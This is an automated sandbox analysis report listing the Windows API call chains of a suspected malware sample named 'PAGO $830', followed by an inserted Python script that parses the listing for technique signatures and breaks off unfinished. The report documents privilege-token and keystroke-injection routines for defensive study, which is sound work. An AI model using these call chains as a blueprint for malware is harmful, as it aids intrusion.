                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$AddressFreeProc
                                                          • String ID:
                                                          • API String ID: 2632591731-0
                                                          • Opcode ID: 63de4b15af36960fb526fb3c1fd3fb9ff24f04dc4ec0c90d3317caaef8d1002a
                                                          • Instruction ID: 2b9516a9e22be38f7f0c00f11aab8dd54b63c73d2cf746cd5e42f66e74dc2f1b
                                                          • Opcode Fuzzy Hash: 63de4b15af36960fb526fb3c1fd3fb9ff24f04dc4ec0c90d3317caaef8d1002a
                                                          • Instruction Fuzzy Hash: BB11C132600A15AACB14FB74C802AAD77A5DF44B10F20C42DF58AA61C2FB70DA469BB1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: __wsopen_s
                                                          • String ID:
                                                          • API String ID: 3347428461-0
                                                          • Opcode ID: d9d9fc392c73133d764bbc516f76edbd66dd28b67bfba41c3bcd6dd76a6bbb5c
                                                          • Instruction ID: 6c2314b46c40b04f87e14806ff9313249d26a5fefa3a721fd76798a88d8007c3
                                                          • Opcode Fuzzy Hash: d9d9fc392c73133d764bbc516f76edbd66dd28b67bfba41c3bcd6dd76a6bbb5c
                                                          • Instruction Fuzzy Hash: D51148B190420AAFCF05DF98E94099A7BF5EF49300F144469FC08AB311DB31DA159BA5
                                                          APIs
                                                            • Part of subcall function 00DA4C0D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA2DB9,00000001,00000364,?,00D8FD75,?,?,00D7B63D,00000000,?,?), ref: 00DA4C4E
                                                          • _free.LIBCMT ref: 00DA4FFC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
                                                          • Instruction ID: b44f0acec0656d5ded30593e333cda886b7b8f1b44320c8b54b2dab42a26f851
                                                          • Opcode Fuzzy Hash: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
                                                          • Instruction Fuzzy Hash: B30126722043056FE3218E698845A5AFBE9EFCA370F25061DE58483280EA70A805CB74
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                          • Instruction ID: 247119b1621df2eaaa0ebd5a56de23a0255887893a23e6ce06faf41edb1a24a0
                                                          • Opcode Fuzzy Hash: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
                                                          • Instruction Fuzzy Hash: B0F028326056209ADF317A6ADC05B5A7798DF83338F160B15F865931C1EFB0D90286B5
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00DA2DB9,00000001,00000364,?,00D8FD75,?,?,00D7B63D,00000000,?,?), ref: 00DA4C4E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 2dd9b924b71ab63900cac366d9ed63fe63b6fb97000c1eee79cc8893a92fe49b
                                                          • Instruction ID: 1f394d712f4411b451be4d466ac7caf44a1052afe56c1eb6efffe831e08f739e
                                                          • Opcode Fuzzy Hash: 2dd9b924b71ab63900cac366d9ed63fe63b6fb97000c1eee79cc8893a92fe49b
                                                          • Instruction Fuzzy Hash: A0F0BE31A472246ADF216F639D05F5A7798EFC3BB0B198126B91DEB181CAE0D80186B1
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00D8FD75,?,?,00D7B63D,00000000,?,?,?,00DE106C,00E0D0D0,?,00DB242E), ref: 00DA37E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                                          • Instruction ID: 2f1b10cf61c834a7852f34bc75c74cba17c10026a017d5ad3a0744fe65090ec0
                                                          • Opcode Fuzzy Hash: d0bbfdb6f4dcb4edd628830a87cafc28e38b3c536f8607184b55dce9ed8f4c7c
                                                          • Instruction Fuzzy Hash: 1BE06DF26052256BEB212B679C05F5A3A5AEF437F0F6A0521BC45E6891EB21CE4186F0
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D7690F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                                          • Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 9a423539f8d3b5eeceebc4bbe8c821b964189494392b7f5eecb9f902df243b89
                                                          • Instruction ID: 7ab7d94ce871b2d10c7553650b31acec97cbd0df6349ed5a13836e5cbb510ff2
                                                          • Opcode Fuzzy Hash: 9a423539f8d3b5eeceebc4bbe8c821b964189494392b7f5eecb9f902df243b89
                                                          • Instruction Fuzzy Hash: 4EF03075105B12CFCB349F65D494852B7F4EF14315324CA3EE2DA92650E732D884DF21
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00D747EF
                                                            • Part of subcall function 00D784E7: _wcslen.LIBCMT ref: 00D784FA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_wcslen
                                                          • String ID:
                                                          • API String ID: 541455249-0
                                                          • Opcode ID: b2528f1641398d7695a15366b07ffeeb9214b8baf86d756291e0af93de133078
                                                          • Instruction ID: b0f272f3b5f4f9f5a50ee0c7fa94cc985ce23dd9f0c652318f99e4a37814a43a
                                                          • Opcode Fuzzy Hash: b2528f1641398d7695a15366b07ffeeb9214b8baf86d756291e0af93de133078
                                                          • Instruction Fuzzy Hash: 08E0CD769002245BC72093D89C05FDA77DEDFC8790F044175FC09D7254DD60ED8085B0
                                                          APIs
                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00DB06A5,?,?,00000000,?,00DB06A5,00000000,0000000C), ref: 00DB0358
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                                          • Instruction ID: 206029e4bd219b0a3caa76f2a094b7108fb2c6bc57e44eb7dd252a0a5274b61e
                                                          • Opcode Fuzzy Hash: 9e247a467790ae1cabc5d06c3cd021d99ac70a8b9e85c10e109db1e9c7f47101
                                                          • Instruction Fuzzy Hash: 2AD06C3204010DBFDF028F85DD06EDA3BAAFB48714F114100BE5866020C732E861AB90
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 013C0D09
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046765974.00000000013BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 013BE000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_13be000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: 130318511173d5554d6de6ed98603185a40d12e61c61d6e162dd9169e2ff3849
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: BAE0E67494010DDFDB00DFB4D54D69D7BF4EF04702F100165FD01D2280D6309D508A62
                                                          APIs
                                                            • Part of subcall function 00D8B021: GetWindowLongW.USER32(?,000000EB), ref: 00D8B032
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00E0950C
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E0954D
                                                          • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00E09591
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E095BB
                                                          • SendMessageW.USER32 ref: 00E095E4
                                                          • GetKeyState.USER32(00000011), ref: 00E0967D
                                                          • GetKeyState.USER32(00000009), ref: 00E0968A
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00E096A0
                                                          • GetKeyState.USER32(00000010), ref: 00E096AA
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00E096DB
                                                          • SendMessageW.USER32 ref: 00E09702
                                                          • SendMessageW.USER32(?,00001030,?,00E07D85), ref: 00E0980A
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00E09820
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00E09833
                                                          • SetCapture.USER32(?), ref: 00E0983C
                                                          • ClientToScreen.USER32(?,?), ref: 00E098A1
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00E098AE
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E098C8
                                                          • ReleaseCapture.USER32 ref: 00E098D3
                                                          • GetCursorPos.USER32(?), ref: 00E0990B
                                                          • ScreenToClient.USER32(?,?), ref: 00E09918
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09972
                                                          • SendMessageW.USER32 ref: 00E099A0
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E099DD
                                                          • SendMessageW.USER32 ref: 00E09A0C
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00E09A2D
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00E09A3C
                                                          • GetCursorPos.USER32(?), ref: 00E09A5A
                                                          • ScreenToClient.USER32(?,?), ref: 00E09A67
                                                          • GetParent.USER32(?), ref: 00E09A85
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 00E09AEC
                                                          • SendMessageW.USER32 ref: 00E09B1D
                                                          • ClientToScreen.USER32(?,?), ref: 00E09B76
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00E09BA6
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00E09BD0
                                                          • SendMessageW.USER32 ref: 00E09BF3
                                                          • ClientToScreen.USER32(?,?), ref: 00E09C40
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00E09C74
                                                            • Part of subcall function 00D8ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00D8ADD2
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E09CF7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
                                                          • String ID: @GUI_DRAGID$F$p#
                                                          • API String ID: 3429851547-638943876
                                                          • Opcode ID: 2d7a829b87daab671a0a9514d07afe6224f26cc4f4de2dea5d9fd25cf2a4d3b7
                                                          • Instruction ID: 557f4d1781ae30147401beaff31c55ac273f3e743cd77950eed2327e4024fab4
                                                          • Opcode Fuzzy Hash: 2d7a829b87daab671a0a9514d07afe6224f26cc4f4de2dea5d9fd25cf2a4d3b7
                                                          • Instruction Fuzzy Hash: 6E42D034604200AFDB25CF65CC44BAABBE5FF89314F105619F695A72E2C732E895CF62
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00E04828
                                                          • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00E0483D
                                                          • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00E0485C
                                                          • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00E04880
                                                          • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00E04891
                                                          • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00E048B0
                                                          • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00E048E3
                                                          • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00E04909
                                                          • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00E04944
                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E0498B
                                                          • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00E049B3
                                                          • IsMenu.USER32(?), ref: 00E049CC
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04A27
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00E04A55
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00E04AC9
                                                          • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00E04B18
                                                          • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00E04BB7
                                                          • wsprintfW.USER32 ref: 00E04BE3
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04BFE
                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04C26
                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00E04C48
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E04C68
                                                          • GetWindowTextW.USER32(?,00000000,00000001), ref: 00E04C8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 4054740463-328681919
                                                          • Opcode ID: 2eaafb7d15761abc3f29be9bff4edaead88857f3c802c4fa544b8f6b9647012d
                                                          • Instruction ID: 0361c85a895ddd26872d1124d0a8b1a6e8ee8c8deb09a67d788dbb733540df73
                                                          • Opcode Fuzzy Hash: 2eaafb7d15761abc3f29be9bff4edaead88857f3c802c4fa544b8f6b9647012d
                                                          • Instruction Fuzzy Hash: CB1202F1500204AFEB249F29CE49FAE7BE8EF45714F105629FA15FA1D0DB719981CB60
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D8EFB7
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D8EFD4
                                                          • IsIconic.USER32(00000000), ref: 00D8EFDD
                                                          • SetForegroundWindow.USER32(00000000), ref: 00D8EFEF
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F005
                                                          • GetCurrentThreadId.KERNEL32 ref: 00D8F00C
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00D8F018
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F029
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F031
                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00D8F039
                                                          • SetForegroundWindow.USER32(00000000), ref: 00D8F03C
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F055
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F060
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F06A
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F06F
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F078
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F07D
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F087
                                                          • keybd_event.USER32(00000012,00000000), ref: 00D8F08C
                                                          • SetForegroundWindow.USER32(00000000), ref: 00D8F08F
                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D8F0AD
                                                          • AttachThreadInput.USER32(?,00000000,00000000), ref: 00D8F0B5
                                                          • AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00D8F0BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 1155518417-2988720461
                                                          • Opcode ID: 4061e73147081e0ce04afdcc64553227f0c48ead01d092bbbccb050781fb8208
                                                          • Instruction ID: 3ae2e555933324b836743fe640af1437dc29ade7659882d8d2d1653b06589110
                                                          • Opcode Fuzzy Hash: 4061e73147081e0ce04afdcc64553227f0c48ead01d092bbbccb050781fb8208
                                                          • Instruction Fuzzy Hash: 22315071A40218BEEB302BB65C4AFBF7E6DEB44B50F240126FA01F61D1D6B25D40AB71
                                                          APIs
                                                            • Part of subcall function 00DD1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
                                                            • Part of subcall function 00DD1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
                                                            • Part of subcall function 00DD1607: GetLastError.KERNEL32 ref: 00DD168E
                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00DD11CA
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00DD11EC
                                                          • CloseHandle.KERNEL32(?), ref: 00DD11FD
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00DD1215
                                                          • GetProcessWindowStation.USER32 ref: 00DD122E
                                                          • SetProcessWindowStation.USER32(00000000), ref: 00DD1238
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00DD1254
                                                            • Part of subcall function 00DD1003: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DD1140), ref: 00DD1018
                                                            • Part of subcall function 00DD1003: CloseHandle.KERNEL32(?,?,00DD1140), ref: 00DD102D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2046388261.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
• Associated: 00000000.00000002.2046372249.0000000000D70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E0C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046431827.0000000000E32000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046470421.0000000000E3C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2046488190.0000000000E44000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d70000_PAGO $830.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                          • String ID: $default$winsta0
                                                          • API String ID: 22674027-1027155976
                                                          • Opcode ID: 2c014a567e9e7f4b3e5ca0c8b08f3d6f4671825d042322adf8b5a35e2021e3e3
                                                          • Instruction ID: 472977e81d1a402a318cd378e59c32d1c0c7274266bf404686df78d4934e4b4b
                                                          • Opcode Fuzzy Hash: 2c014a567e9e7f4b3e5ca0c8b08f3d6f4671825d042322adf8b5a35e2021e3e3
                                                          • Instruction Fuzzy Hash: 0D816DB5900209BFDF259FA5DC49BEE7BB8EF44700F18412AF911B62A0D7768985CB70
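The two routines above (the Shell_TrayWnd / AttachThreadInput / keybd_event one and the LogonUserW / DuplicateTokenEx / OpenWindowStationW one) and the GetUserObjectSecurity / AddAce / SetUserObjectSecurity routine listed further down are easier to reason about as API sets than as hash blocks. The script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the "APIs" listing format shown on this page into per-function records (direct calls, "Part of subcall function" calls, String ID, Opcode ID) and matches each record against three hand-written technique signatures. The signature sets, the record layout and the shortened sample input (lines copied from this page's listing) are the example's own assumptions. A hit means the capability is present in the binary's code; since the page identifies the file as a compiled AutoIt script, these routines are consistent with the AutoIt runtime itself (window activation and RunAs support) and do not by themselves prove the embedded script uses them.

```python
"""Parse a Joe Sandbox per-function 'APIs' listing and flag technique signatures.
Added example; not part of the Joe Sandbox report or of the analysed sample."""
import re
from dataclasses import dataclass, field

# Constructed sample: lines copied from this page's listing, shortened to the
# calls that matter for the signatures below.
SAMPLE_REPORT = """\
APIs
• GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00D8EFB7
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00D8EFD4
• SetForegroundWindow.USER32(00000000), ref: 00D8EFEF
• GetCurrentThreadId.KERNEL32 ref: 00D8F00C
• AttachThreadInput.USER32(?,00000000,00000001), ref: 00D8F029
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00D8F055
• keybd_event.USER32(00000012,00000000), ref: 00D8F060
• AttachThreadInput.USER32(?,000000FF,00000000), ref: 00D8F0AD
Strings
Similarity
• String ID: Shell_TrayWnd
• Opcode ID: 4061e73147081e0ce04afdcc64553227f0c48ead01d092bbbccb050781fb8208
APIs
  • Part of subcall function 00DD1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00DD1651
  • Part of subcall function 00DD1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00DD167E
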